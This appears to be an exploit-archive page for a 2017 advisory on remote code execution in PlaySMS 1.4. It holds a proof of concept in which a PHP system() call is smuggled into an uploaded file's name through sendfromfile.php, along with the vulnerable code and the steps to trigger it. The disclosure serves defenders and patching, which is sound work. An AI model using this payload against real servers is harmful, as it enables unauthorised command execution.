PlaySms 1.4 Remote Code Execution

PlaySms 1.4 Remote Code Execution: Posted May 16, 2017; Authored by Touhid M.Shaikh; PlaySms version 1.4 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 9878587e8dfdd2451061b778be33b8def9e7dcb8aa71d1ad6556d9627a73ab36; Download | Favorite | View

PlaySms 1.4 Remote Code Execution

# Exploit Title: PlaySMS 1.4 Code Execution using $filename and Unrestricted File Upload in sendfromfile.php
# Date: 14-05-2017
# Software Link: https://playsms.org/download/
# Version: 1.4
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps
  
1. Description
    
Unrestricted File Upload: 
    Any registered user can upload any file because of not proper Validation of file in sendfromfile.php
 
Code Execution using $filename 
    Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily  but not store in any folder so our shell is useless. But if User change the file name to "mybackdoor.php" to "<?php system('uname -a'); dia();?>.php"  den server check for file and set some perameter $filename="<?php system('uname -a'); dia();?>.php" , U can see code below and display $filename on page.
 
 For More Details : www.touhidshaikh.com/blog/
    
2. Proof of Concept
  
Login as regular user (created using index.php?app=main&inc=core_auth&route=register):
 
Go to : http://127.0.0.1/playsms/index.php?app=main&inc=feature_sendfromfile&op=list
  
 
 This is Form.
----------------------------Form for upload CSV file ----------------------
<form action=\"index.php?app=main&inc=feature_sendfromfile&op=upload_confirm\" enctype=\"multipart/form-data\" method=\"post\">
" . _CSRF_FORM_ . "
<p>" . _('Please select CSV file') . "</p>
<p><input type=\"file\" name=\"fncsv\"></p>
<p class=help-block>" . _('CSV file format') . " : " . $info_format . "</p>
<p><input type=checkbox name=fncsv_dup value=1 checked> " . _('Prevent duplicates') . "</p>
<p><input type=\"submit\" value=\"" . _('Upload file') . "\" class=\"button\"></p>
</form>
------------------------------Form ends ---------------------------
 
 
-------------PHP code for set parameter ---------------------------
 
    case 'upload_confirm':
        $filename = $_FILES['fncsv']['name'];
 
------------------------------php code ends ---------------------------
 
 
$filename will be visible on page:
----------------------Vulnerable perameter show ----------------------
 
line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />';
 
----------------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

PlaySms 1.4 Remote Code Execution

PlaySms 1.4 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PlaySms 1.4 Remote Code Execution

Share This

PlaySms 1.4 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems